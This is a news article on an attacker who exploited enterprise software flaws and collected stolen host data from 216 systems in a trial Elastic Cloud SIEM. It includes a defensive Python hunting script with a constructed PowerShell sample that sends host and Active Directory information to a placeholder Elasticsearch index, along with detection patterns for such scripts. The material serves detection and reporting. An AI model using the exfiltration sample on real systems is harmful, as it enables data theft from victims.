Threat Actor Exploits Flaws and Uses Elastic Cloud SIEM to Manage Stolen Data

A campaign exploiting multiple software vulnerabilities to steal system data and store it in a cloud-based security platform has been uncovered by cybersecurity researchers.

Investigators found that a threat actor used a free-trial instance of Elastic Cloud's security information and event management (SIEM) platform to collect and analyse data from compromised systems across dozens of organisations.

The activity was discovered by researchers at Huntress, who observed attackers exploiting flaws in widely used enterprise software, including SolarWinds Web Help Desk.

Instead of using traditional command-and-control (C2) infrastructure, the attacker exfiltrated victim data directly into an attacker-controlled instance of Elastic Cloud, effectively turning a legitimate security monitoring tool into a repository for stolen information.

Elastic Trial as Data Hub and VPN Infrastructure

According to the investigation, the attacker deployed a base64-encoded PowerShell command on compromised systems that gathered detailed host information. The script collected operating system details, hardware specifications, Active Directory data and installed patch information before transmitting it to an Elasticsearch index named "systeminfo" inside the attacker's trial deployment.
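The pattern described above, an encoded PowerShell command that profiles the host and writes the result straight into an Elasticsearch index, is something a defender can hunt for in process-creation telemetry. The following is an added example, not Huntress's code and not the threat actor's script: it decodes `-EncodedCommand` payloads from constructed Sysmon-style process events, then looks for the combination of outbound HTTP calls, Elasticsearch document-API paths (`/<index>/_doc`, `/_create`, `/_bulk`, which are the real Elasticsearch indexing endpoints) and host-reconnaissance cmdlets. The sample events, the representative script and the endpoint hostname are all constructed for illustration; the real indicators are not on this page.

```python
import base64
import re
from typing import Dict, List, Optional

# Constructed stand-in for the kind of payload the article describes: collect host
# facts, then POST them to an Elasticsearch index called "systeminfo". This is NOT
# the actor's script, and the hostname is a placeholder.
SAMPLE_PS = (
    "$info = Get-ComputerInfo | Select-Object OsName, OsVersion, CsDomain, CsTotalPhysicalMemory;"
    "$body = $info | ConvertTo-Json;"
    "Invoke-RestMethod -Method Post -ContentType 'application/json' "
    "-Uri 'https://deployment-placeholder.es.example:9243/systeminfo/_doc' -Body $body"
)


def encode_powershell(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# -EncodedCommand and its short forms (-enc, -ec, -e). The \s+ keeps -ep / -ExecutionPolicy
# from matching as "-e".
ENC_FLAG = re.compile(r"-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if the command line carries an encoded command, else None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


# Signals looked for inside the decoded script.
WEB_CALL = re.compile(r"Invoke-RestMethod|Invoke-WebRequest|Net\.WebClient|HttpClient", re.IGNORECASE)
# Elasticsearch document API: https://host[:port]/<index>/_doc | _create | _bulk
ES_DOC_API = re.compile(r"https?://[^\s'\"]+/([A-Za-z0-9_.-]+)/(_doc|_create|_bulk)\b", re.IGNORECASE)
RECON = re.compile(
    r"Get-ComputerInfo|Get-HotFix|Get-CimInstance|Get-WmiObject|Get-AD(?:Computer|Domain|User)|\[ADSI\]",
    re.IGNORECASE,
)


def analyse_event(event: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Flag an encoded PowerShell process event that ships data out over HTTP.

    Recon cmdlets alone are routine admin activity, so the outbound web call is required;
    a write to an Elasticsearch index is the high-confidence signal.
    """
    script = decode_encoded_command(event["cmdline"])
    if script is None:
        return None
    es_hit = ES_DOC_API.search(script)
    if not WEB_CALL.search(script) and es_hit is None:
        return None
    reasons: List[str] = []
    if WEB_CALL.search(script):
        reasons.append("outbound HTTP call from encoded PowerShell")
    if es_hit:
        reasons.append(f"Elasticsearch document API write to index '{es_hit.group(1)}'")
    if RECON.search(script):
        reasons.append("host/AD reconnaissance cmdlets")
    return {
        "host": event["host"],
        "index": es_hit.group(1) if es_hit else None,
        "reasons": reasons,
        "script": script,
    }


def hunt(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run analyse_event over a batch of process-creation events and keep the hits."""
    return [r for r in (analyse_event(e) for e in events) if r is not None]


# Constructed process-creation events (Sysmon Event ID 1 shape, trimmed to host and cmdline).
SAMPLE_EVENTS = [
    {"host": "SRV-01", "cmdline": "powershell.exe -NoProfile -NonInteractive -EncodedCommand "
                                   + encode_powershell(SAMPLE_PS)},
    {"host": "WS-07", "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
    {"host": "SRV-02", "cmdline": "powershell.exe -enc "
                                   + encode_powershell("Get-Service | Where-Object Status -eq 'Running'")},
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit["host"], "->", hit["index"], ";", "; ".join(hit["reasons"]))
```

Only SRV-01 is reported: WS-07 has no encoded command, and SRV-02 is encoded but never leaves the host. In a real environment the same logic runs over the 4104 script-block log or the Sysmon command line, and the decoded script is what you want to retain for the case file, since the index name and destination host identify the attacker's deployment.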

Researchers said the tactic allowed the operator to triage victims and prioritise targets using SIEM tools designed for defensive security monitoring.

The Elastic Cloud deployment was created on January 28, 2026, and remained active for several days. Telemetry showed the operator repeatedly interacting with the environment through the Kibana interface, logging hundreds of actions while examining incoming victim data.

Further analysis revealed that the trial account was registered using a disposable email address linked to the domain quieresmail.com. Investigators believe the address format is tied to the Russian-registered temporary email network firstmail.ltd, which operates hundreds of throwaway domains.

Additional evidence suggested the attacker reused random eight-character identifiers across their infrastructure, including both email registrations and subdomains used to host tooling on Cloudflare worker pages.

Administrative logins to the SIEM instance were traced to IP addresses believed to originate from a SAFING VPN privacy network tunnel.

Hundreds of Systems Affected

Data recovered from the attacker's Elastic environment indicated that the campaign affected at least 216 hosts across 34 Active Directory domains. The majority of compromised machines were servers, most commonly running Windows Server 2019 or 2022.

Victims appeared across numerous sectors, including:

  • Government organisations

  • Universities and educational institutions

  • Financial services companies

  • Manufacturing and automotive firms

  • IT service providers and retailers

Some hostnames suggested the attacker was also exploiting vulnerabilities in other enterprise platforms, including Microsoft SharePoint.

Researchers coordinated with Elastic and law enforcement to notify affected organisations and investigate the infrastructure. The cloud instance used in the campaign has since been taken offline.

"We have performed outreach and victim notification to organizations that we believe were indicated within the uncovered data, and we have coordinated with Elastic in a collaborative effort to further investigate and take down this threat actor infrastructure," Huntress said in its blog. 